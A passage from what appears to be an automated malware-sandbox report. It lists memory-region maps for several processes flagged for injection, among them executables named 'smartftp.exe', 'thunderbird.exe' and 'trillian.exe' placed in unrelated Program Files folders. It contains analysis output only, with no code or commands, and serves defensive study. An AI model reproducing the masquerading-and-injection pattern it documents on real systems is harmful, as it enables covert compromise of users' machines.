"\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 3710 start_va = 0x75140000 end_va = 0x7519bfff monitored = 0 entry_point = 0x7517f9f4 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 3711 start_va = 0x751a0000 end_va = 0x751defff monitored = 0 entry_point = 0x751ce088 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 3712 start_va = 0x75400000 end_va = 0x7540bfff monitored = 0 entry_point = 0x754010e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 3713 start_va = 0x75410000 end_va = 0x7546ffff monitored = 0 entry_point = 0x7542a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 3714 start_va = 0x76270000 end_va = 0x762fffff monitored = 0 entry_point = 0x76286343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 3715 start_va = 0x76300000 end_va = 0x7639cfff monitored = 0 entry_point = 0x76333fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 3716 start_va = 0x766d0000 end_va = 0x767cffff monitored = 0 entry_point = 0x766eb6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 3717 start_va = 0x769e0000 end_va = 0x76acffff monitored = 0 entry_point = 0x769f0569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 3718 start_va = 0x76b90000 end_va = 0x76c3bfff monitored = 0 entry_point = 0x76b9a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 3719 start_va = 0x77050000 end_va = 0x7711bfff monitored = 0 entry_point = 0x7705168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 3720 start_va = 0x77180000 end_va = 0x7721ffff monitored = 0 entry_point = 0x771949e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 3721 start_va = 0x772b0000 end_va = 0x773bffff monitored = 0 entry_point = 0x772c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3722 start_va = 0x773e0000 end_va = 0x77426fff monitored = 0 entry_point = 0x773e74c1 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 3723 start_va = 0x77430000 end_va = 0x7748ffff monitored = 0 entry_point = 0x7744158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 3724 start_va = 0x77490000 end_va = 0x774a8fff monitored = 0 entry_point = 0x77494975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 3725 start_va = 0x774c0000 end_va = 0x775defff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000774c0000" filename = "" Region: id = 3726 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000775e0000" filename = "" Region: id = 3727 start_va = 0x776e0000 end_va = 0x77888fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3728 start_va = 0x77890000 end_va = 0x77899fff monitored = 0 entry_point = 0x778936a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 3729 start_va = 0x778c0000 end_va = 0x77a3ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 3730 start_va = 0x7efb0000 end_va = 0x7efd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 3731 start_va = 0x7efdb000 end_va = 0x7efddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 3732 start_va = 0x7efde000 end_va = 0x7efdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 3733 start_va = 0x7efdf000 end_va = 0x7efdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 3734 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 3735 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 3736 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3737 start_va = 0x7fff0000 end_va = 0x7fffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 3739 start_va = 0x920000 end_va = 0xa84fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000920000" filename = "" Thread: id = 185 os_tid = 0x8d0 Process: id = "32" image_name = "smartftp.exe" filename = "c:\\program files\\windowspowershell\\smartftp.exe" page_root = "0x4d626000" os_pid = "0x8e4" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "8" os_parent_pid = "0x45c" cmd_line = "\"C:\\Program Files\\WindowsPowerShell\\smartftp.exe\" " cur_dir = "C:\\Program Files\\WindowsPowerShell\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e957" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3740 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3741 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3742 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3743 start_va = 0x40000 end_va = 0x40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 3744 start_va = 0x50000 end_va = 0x53fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 3745 start_va = 0x60000 end_va = 0x60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 3746 start_va = 0x80000 end_va = 0xbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 3747 start_va = 0xd0000 end_va = 0x14ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 3748 start_va = 0x150000 end_va = 0x1b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3749 start_va = 0x1d0000 end_va = 0x20ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 3750 start_va = 0x210000 end_va = 0x30ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 3751 start_va = 0x320000 end_va = 0x41ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 3752 start_va = 0x420000 end_va = 0x5a7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 3753 start_va = 0x5b0000 end_va = 0x5bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 3754 start_va = 0x5c0000 end_va = 0x740fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 3755 start_va = 0x750000 end_va = 0x82efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000750000" filename = "" Region: id = 3756 start_va = 0xa30000 end_va = 0xa46fff monitored = 0 entry_point = 0xa314a1 region_type = mapped_file name = "smartftp.exe" filename = "\\Program Files\\WindowsPowerShell\\smartftp.exe" (normalized: "c:\\program files\\windowspowershell\\smartftp.exe") Region: id = 3757 start_va = 0xa50000 end_va = 0x1e4ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a50000" filename = "" Region: id = 3758 start_va = 0x1e50000 end_va = 0x2813fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e50000" filename = "" Region: id = 3759 start_va = 0x73430000 end_va = 0x73432fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\SysWOW64\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\syswow64\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 3760 start_va = 0x742a0000 end_va = 0x742b2fff monitored = 0 entry_point = 0x742a1d3f region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 3761 start_va = 0x74320000 end_va = 0x7439ffff monitored = 0 entry_point = 0x743337c9 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 3762 start_va = 0x75130000 end_va = 0x75137fff monitored = 0 entry_point = 0x751320f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 3763 start_va = 0x75140000 end_va = 0x7519bfff monitored = 0 entry_point = 0x7517f9f4 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 3764 start_va = 0x751a0000 end_va = 0x751defff monitored = 0 entry_point = 0x751ce088 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 3765 start_va = 0x75400000 end_va = 0x7540bfff monitored = 0 entry_point = 0x754010e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 3766 start_va = 0x75410000 end_va = 0x7546ffff monitored = 0 entry_point = 0x7542a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 3767 start_va = 0x76270000 end_va = 0x762fffff monitored = 0 entry_point = 0x76286343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 3768 start_va = 0x76300000 end_va = 0x7639cfff monitored = 0 entry_point = 0x76333fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 3769 start_va = 0x766d0000 end_va = 0x767cffff monitored = 0 entry_point = 0x766eb6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 3770 start_va = 0x769e0000 end_va = 0x76acffff monitored = 0 entry_point = 0x769f0569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 3771 start_va = 0x76b90000 end_va = 0x76c3bfff monitored = 0 entry_point = 0x76b9a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 3772 start_va = 0x77050000 end_va = 0x7711bfff monitored = 0 entry_point = 0x7705168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 3773 start_va = 0x77180000 end_va = 0x7721ffff monitored = 0 entry_point = 0x771949e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 3774 start_va = 0x772b0000 end_va = 0x773bffff monitored = 0 entry_point = 0x772c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3775 start_va = 0x773e0000 end_va = 0x77426fff monitored = 0 entry_point = 0x773e74c1 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 3776 start_va = 0x77430000 end_va = 0x7748ffff monitored = 0 entry_point = 0x7744158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 3777 start_va = 0x77490000 end_va = 0x774a8fff monitored = 0 entry_point = 0x77494975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 3778 start_va = 0x774c0000 end_va = 0x775defff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000774c0000" filename = "" Region: id = 3779 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000775e0000" filename = "" Region: id = 3780 start_va = 0x776e0000 end_va = 0x77888fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3781 start_va = 0x77890000 end_va = 0x77899fff monitored = 0 entry_point = 0x778936a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 3782 start_va = 0x778c0000 end_va = 0x77a3ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 3783 start_va = 0x7efb0000 end_va = 0x7efd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 3784 start_va = 0x7efdb000 end_va = 0x7efddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 3785 start_va = 0x7efde000 end_va = 0x7efdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 3786 start_va = 0x7efdf000 end_va = 0x7efdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 3787 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 3788 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 3789 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3790 start_va = 0x7fff0000 end_va = 0x7fffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 3792 start_va = 0x830000 end_va = 0x9b1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000830000" filename = "" Thread: id = 186 os_tid = 0x8ec Process: id = "33" image_name = "thunderbird.exe" filename = "c:\\program files\\uninstall information\\thunderbird.exe" page_root = "0x4cd2c000" os_pid = "0x8f0" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "8" os_parent_pid = "0x45c" cmd_line = "\"C:\\Program Files\\Uninstall Information\\thunderbird.exe\" " cur_dir = "C:\\Program Files\\Uninstall Information\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e957" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3793 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3794 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3795 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3796 start_va = 0x40000 end_va = 0x40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 3797 start_va = 0x50000 end_va = 0x53fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 3798 start_va = 0x60000 end_va = 0x60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 3799 start_va = 0x70000 end_va = 0xeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 3800 start_va = 0x120000 end_va = 0x136fff monitored = 0 entry_point = 0x1214a1 region_type = mapped_file name = "thunderbird.exe" filename = "\\Program Files\\Uninstall Information\\thunderbird.exe" (normalized: "c:\\program files\\uninstall information\\thunderbird.exe") Region: id = 3801 start_va = 0x140000 end_va = 0x23ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000140000" filename = "" Region: id = 3802 start_va = 0x250000 end_va = 0x28ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 3803 start_va = 0x290000 end_va = 0x2f6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3804 start_va = 0x300000 end_va = 0x33ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 3805 start_va = 0x360000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 3806 start_va = 0x460000 end_va = 0x5e7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3807 start_va = 0x620000 end_va = 0x62ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000620000" filename = "" Region: id = 3808 start_va = 0x630000 end_va = 0x7b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 3809 start_va = 0x7c0000 end_va = 0x1bbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007c0000" filename = "" Region: id = 3810 start_va = 0x1bc0000 end_va = 0x1c9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001bc0000" filename = "" Region: id = 3811 start_va = 0x1ca0000 end_va = 0x2663fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ca0000" filename = "" Region: id = 3812 start_va = 0x73430000 end_va = 0x73432fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\SysWOW64\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\syswow64\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 3813 start_va = 0x742a0000 end_va = 0x742b2fff monitored = 0 entry_point = 0x742a1d3f region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 3814 start_va = 0x74320000 end_va = 0x7439ffff monitored = 0 entry_point = 0x743337c9 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 3815 start_va = 0x75130000 end_va = 0x75137fff monitored = 0 entry_point = 0x751320f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 3816 start_va = 0x75140000 end_va = 0x7519bfff monitored = 0 entry_point = 0x7517f9f4 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 3817 start_va = 0x751a0000 end_va = 0x751defff monitored = 0 entry_point = 0x751ce088 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 3818 start_va = 0x75400000 end_va = 0x7540bfff monitored = 0 entry_point = 0x754010e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 3819 start_va = 0x75410000 end_va = 0x7546ffff monitored = 0 entry_point = 0x7542a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 3820 start_va = 0x76270000 end_va = 0x762fffff monitored = 0 entry_point = 0x76286343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 3821 start_va = 0x76300000 end_va = 0x7639cfff monitored = 0 entry_point = 0x76333fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 3822 start_va = 0x766d0000 end_va = 0x767cffff monitored = 0 entry_point = 0x766eb6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 3823 start_va = 0x769e0000 end_va = 0x76acffff monitored = 0 entry_point = 0x769f0569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 3824 start_va = 0x76b90000 end_va = 0x76c3bfff monitored = 0 entry_point = 0x76b9a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 3825 start_va = 0x77050000 end_va = 0x7711bfff monitored = 0 entry_point = 0x7705168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 3826 start_va = 0x77180000 end_va = 0x7721ffff monitored = 0 entry_point = 0x771949e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 3827 start_va = 0x772b0000 end_va = 0x773bffff monitored = 0 entry_point = 0x772c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3828 start_va = 0x773e0000 end_va = 0x77426fff monitored = 0 entry_point = 0x773e74c1 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 3829 start_va = 0x77430000 end_va = 0x7748ffff monitored = 0 entry_point = 0x7744158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 3830 start_va = 0x77490000 end_va = 0x774a8fff monitored = 0 entry_point = 0x77494975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 3831 start_va = 0x774c0000 end_va = 0x775defff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000774c0000" filename = "" Region: id = 3832 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000775e0000" filename = "" Region: id = 3833 start_va = 0x776e0000 end_va = 0x77888fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3834 start_va = 0x77890000 end_va = 0x77899fff monitored = 0 entry_point = 0x778936a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 3835 start_va = 0x778c0000 end_va = 0x77a3ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 3836 start_va = 0x7efb0000 end_va = 0x7efd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 3837 start_va = 0x7efdb000 end_va = 0x7efddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 3838 start_va = 0x7efde000 end_va = 0x7efdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 3839 start_va = 0x7efdf000 end_va = 0x7efdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 3840 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 3841 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 3842 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3843 start_va = 0x7fff0000 end_va = 0x7fffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 3845 start_va = 0x2670000 end_va = 0x2788fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002670000" filename = "" Thread: id = 187 os_tid = 0x8e0 Process: id = "34" image_name = "trillian.exe" filename = "c:\\program files\\windows photo viewer\\trillian.exe" page_root = "0x4cc32000" os_pid = "0x8e8" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "8" os_parent_pid = "0x45c" cmd_line = "\"C:\\Program Files\\Windows Photo Viewer\\trillian.exe\" " cur_dir = "C:\\Program Files\\Windows Photo Viewer\\" os_username = 